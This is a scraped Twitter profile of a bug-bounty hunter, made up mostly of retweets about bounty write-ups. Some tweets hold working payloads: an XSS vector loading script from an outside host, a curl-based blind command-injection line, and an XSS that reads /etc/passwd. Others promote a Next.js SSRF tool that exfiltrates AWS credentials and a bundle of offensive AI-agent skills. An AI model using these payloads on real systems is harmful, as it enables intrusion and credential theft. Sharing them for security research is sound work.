MrD0tt @MrD0tt - Twitter Profile

Pinned Tweet

over 2 years ago

Remote Code Execution of PHPUnit (RCE) POC Video How I found RCE in five minutes. https://t.co/r2ud9BQeM3 #bugbountytip #infosecurity #infosec #BugBounty #bugbountytips #CVE_2017_9841 #rce

2

6

0

3

2K

MrD0tt retweeted

Densel @luckyhacker43

4 days ago · Sigor

$13,950 GitLab Bug Bounty 🤯🔥 XSS in ZenTao integration affecting self hosted instances without strict CSP by joaxcar 👨‍💻 Johan Carlsson (x/joaxcar) 🔗 https://t.co/L0UFJWLdTF 🔗 Join team 👉https://t.co/FeMz53HSN0

luckyhacker43's tweet photo. $13,950 GitLab Bug Bounty 🤯🔥

XSS in ZenTao integration affecting self hosted instances without strict CSP by joaxcar

👨‍💻 Johan Carlsson (x/joaxcar)
🔗 https://t.co/L0UFJWLdTF

🔗 Join team 👉https://t.co/FeMz53HSN0 https://t.co/e3WTrkXl63

0

121

12

72

4K

MrD0tt retweeted

KNOXSS @KN0X55

5 days ago

HPP XSS Vector Two params, one payload. Let the backend connect the dots. ?p=1"><Img Src=//X55.is?%20&p= 1%20OnLoad=import(src)> Works for: - ASP .NET (comma concat) - Express (array join) - Flask (getlist) - Django (getlist) #hack2learn

0

69

10

42

3K

MrD0tt retweeted

Densel @luckyhacker43

5 days ago · Sigor

$850 CloudFlare Bug Bounty 🤑 When You Get Your MCP Wrong: Second-Order XSS to Cloudflare Access Account Takeover by Nishant 🤯🔥 👨‍💻 Nishant (x/matured_kazama) 🔗 https://t.co/rAccSrM4tJ 🔗 Join team 👉https://t.co/FeMz53HSN0

luckyhacker43's tweet photo. $850 CloudFlare Bug Bounty 🤑

When You Get Your MCP Wrong: Second-Order XSS to Cloudflare Access Account Takeover by Nishant 🤯🔥

👨‍💻 Nishant (x/matured_kazama)
🔗 https://t.co/rAccSrM4tJ

🔗 Join team 👉https://t.co/FeMz53HSN0 https://t.co/fkP1kTcpRE

1

103

11

53

4K

Who to follow

Bug Hunter 🏍️ tripping 🏍️

Harshal mali

@Harshal37008050

ETHICAL HACKER \ BUG HUNTER..

MrD0tt retweeted

skull

@brutecat

5 days ago

Hacking Google with A.I. for $500,000 https://t.co/S8NbDU9ZaN

59

2K

501

3K

324K

MrD0tt retweeted

Densel @luckyhacker43

6 days ago · Sigor

$12,500 Bug Bounty 💰 Making HTTP header injection critical via response queue poisoning by James Kettle 🤯🔥 👨‍💻 James Kettle (x/albinowax) 🔗 https://t.co/CXboIS6LXZ 🔗 Join team 👉https://t.co/FeMz53HSN0

luckyhacker43's tweet photo. $12,500 Bug Bounty 💰

Making HTTP header injection critical via response queue poisoning by James Kettle 🤯🔥

👨‍💻 James Kettle (x/albinowax)
🔗 https://t.co/CXboIS6LXZ

🔗 Join team 👉https://t.co/FeMz53HSN0 https://t.co/PnG0CSN7As

1

353

44

258

10K

MrD0tt retweeted

Densel @luckyhacker43

8 days ago · Sigor

"From Default IIS Page to Critical SQL Injection" 🤯🔥 👨‍💻 Ahmad Mugh33ra 🔗 https://t.co/8tfq5xi81n Join our channel for more, link on my bio

luckyhacker43's tweet photo. "From Default IIS Page to Critical SQL Injection" 🤯🔥

👨‍💻 Ahmad Mugh33ra
🔗 https://t.co/8tfq5xi81n
Join our channel for more, link on my bio https://t.co/mNvH1ldBSz

3

235

32

192

10K

MrD0tt retweeted

termireum @termireum

9 days ago

From 403 Forbidden to a €1,500 Bounty https://t.co/uwD4qPcxM4

3

267

39

218

16K

MrD0tt @MrD0tt

10 days ago

@_kujen5 @cantinasecurity Great job buddy. Reward doesn’t matter but the effort was genuine and got acknowledged, that’s enough.

0

1

0

42

MrD0tt @MrD0tt

10 days ago

@wadgamaraldeen Yogosha

0

55

MrD0tt @MrD0tt

11 days ago

@only01Essential Congratulations. Which org it is? Although I am not a web3 pro.

0

14

MrD0tt retweeted

DarkShadow @darkshadow2bd

22 days ago

?url= ❌SSRF, ✅RCE if you find a parameter which passing url then, before testing SSRF try to test RCE. 1. bypass: ?url=http://x"; [now add here your blind rce payload] 2. payload: curl${ IFS }burp-collab-link;# Join my BugBounty telegram channel: https://t.co/k00oXcRJsi

darkshadow2bd's tweet photo. ?url= ❌SSRF, ✅RCE
if you find a parameter which passing url then, before testing SSRF try to test RCE.

1. bypass: ?url=http://x"; [now add here your blind rce payload]
2. payload: curl${ IFS }burp-collab-link;#

Join my BugBounty telegram channel: https://t.co/k00oXcRJsi https://t.co/pEmHEpYxO3

4

623

88

510

28K

MrD0tt retweeted

Vivek | Cybersecurity

@VivekIntel

23 days ago

Claude Code Skill Bundle for Bug Bounty Hunting & External Red Team Operations 🤖💀 • 51 offensive security skills + 15 slash commands • Trained on 574+ disclosed HackerOne-style report patterns • Covers XSS, SSRF, SQLi, OAuth, JWT, GraphQL, RCE, IDOR & API abuse • Enterprise attack chains for M365, Okta, VPNs, SharePoint & vCenter • Built-in recon, exploit chaining, triage, evidence hygiene & reporting https://t.co/89R7Cx20oz #BugBounty #RedTeam #CyberSecurity #Pentesting #AppSec

VivekIntel's tweet photo. Claude Code Skill Bundle for Bug Bounty Hunting & External Red Team Operations 🤖💀

• 51 offensive security skills + 15 slash commands • Trained on 574+ disclosed HackerOne-style report patterns • Covers XSS, SSRF, SQLi, OAuth, JWT, GraphQL, RCE, IDOR & API abuse • Enterprise attack chains for M365, Okta, VPNs, SharePoint & vCenter • Built-in recon, exploit chaining, triage, evidence hygiene & reporting

https://t.co/89R7Cx20oz

#BugBounty #RedTeam #CyberSecurity #Pentesting #AppSec

3

758

179

920

32K

MrD0tt retweeted

Yunus Emre Öztaş

@ynsmroztas

about 1 month ago

🚨 CVE-2026-44578 — Next.js WebSocket SSRF Built a scanner + interactive exploit shell. AWS credentials exfiltrated in 3 steps: [1/3] Cloud auto-detect → AWS confirmed [2/3] IAM role found: profile [3/3] 🎯 AccessKeyId + SecretKey + Token ✅ Pipeline ready: subfinder | httpx | nextssrf ✅ Zero dependencies (stdlib only) ✅ Interactive shell with auto IAM chain Affected: Next.js 13.4.13 → 15.5.15 Fixed: 15.5.16 / 16.2.5 (self-hosted only) 🔗 https://t.co/vLwbUYJ8Dz #BugBounty #InfoSec #RedTeam #AppSec #bugbountytip #bugbountytips #infosec #recon

5

448

88

380

24K

MrD0tt @MrD0tt

about 1 month ago

@Shabosec @sachin_pandey98 @lostsec_ @Olamdeen Scammer with fake screenshot 😂😂😂 trying to gain followers. search site:*.co.org you will see nothing. Jerk.

2

4

0

163

MrD0tt retweeted

Brut 🇮🇳 @wtf_yodhha

3 months ago

CVE-2026-29000: Critical Auth Bypass in pac4j-jwt: Full PoC Using Only a Public Key https://t.co/kE776wB4Ae #BugBounty #bugbountytips

1

63

14

52

4K

MrD0tt retweeted

bugcrowd

@Bugcrowd

3 months ago

The difference between a "Blocked" notification and a $5,000 bounty. 💸

5

864

72

361

36K

MrD0tt retweeted

VIEH Group

@viehgroup

5 months ago

XSS to LFI 😎 Payload -> <img src="echopwn" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/> Root Idea -> Here XSS payload is using an <img> tag with a broken src. The onerror event triggers JavaScript execution. JavaScript writes an <iframe> into the page. The iframe loads a local file (file:///etc/passwd), attempting LFI via XSS. Credit: Rachit #bugbounty #bugbountytips

viehgroup's tweet photo. XSS to LFI 😎

Payload ->
<img src="echopwn" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

Root Idea ->
Here XSS payload is using an <img> tag with a broken src. The onerror event triggers JavaScript execution. JavaScript writes an <iframe> into the page. The iframe loads a local file (file:///etc/passwd), attempting LFI via XSS.

Credit: Rachit

#bugbounty #bugbountytips

2

172

24

121

7K

MrD0tt @MrD0tt

5 months ago

@sl4x0 Congrats bro. Can you please clear it? After more than 24h+ of pkg published, we can push the poc with curl command and this will get ban or package deletion? and we can safely wait for execution by the org. which will shape it ultimate critical?

0

124

MrD0tt retweeted